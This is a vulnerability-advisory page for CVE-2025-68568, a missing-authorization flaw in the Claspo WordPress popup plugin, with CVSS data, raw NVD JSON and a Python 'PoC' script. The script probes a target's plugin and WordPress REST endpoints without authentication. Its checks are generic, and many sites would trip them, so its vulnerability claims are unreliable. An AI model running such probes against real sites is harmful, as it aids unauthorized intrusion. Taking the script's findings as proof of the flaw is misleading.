Security Vulnerability Report
中文
CVE-2025-68568 CVSS 5.3 MEDIUM

CVE-2025-68568

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:31

Description

Missing Authorization vulnerability in Claspo Popup Builders Claspo – Popups, Spin the Wheel & Email Capture claspo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Claspo – Popups, Spin the Wheel & Email Capture: from n/a through <= 1.0.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Claspo Popup Builder <= 1.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68568 PoC - Claspo Plugin Authorization Bypass # This PoC demonstrates the missing authorization vulnerability in Claspo plugin import requests import json import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-68568 Missing Authorization in Claspo Popup Builder plugin """ # Common API endpoints used by Claspo plugin api_endpoints = [ '/wp-json/claspo/v1/', '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68568 - Claspo Plugin Authorization Bypass\n") for endpoint in api_endpoints: full_url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {full_url}") try: # Try to access without authentication response = requests.get(full_url, headers=headers, timeout=10, verify=False) print(f" Status: {response.status_code}") # Check for sensitive data exposure if response.status_code == 200: try: data = response.json() if data: print(f" [+] Potential unauthorized access detected!") print(f" Response preview: {str(data)[:200]}...") return True except: if 'claspo' in response.text.lower() or 'popup' in response.text.lower(): print(f" [+] Claspo-related endpoint exposed without auth") return True except requests.RequestException as e: print(f" [!] Request failed: {e}") print("\n[-] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-68568.py <target_url>") print("Example: python cve-2025-68568.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68568", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:23.710", "lastModified": "2026-04-27T19:16:31.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Claspo Popup Builders Claspo – Popups, Spin the Wheel & Email Capture claspo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Claspo – Popups, Spin the Wheel & Email Capture: from n/a through <= 1.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/claspo/vulnerability/wordpress-popup-builder-exit-intent-pop-up-spin-the-wheel-newsletter-signup-email-capture-lead-generation-forms-maker-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}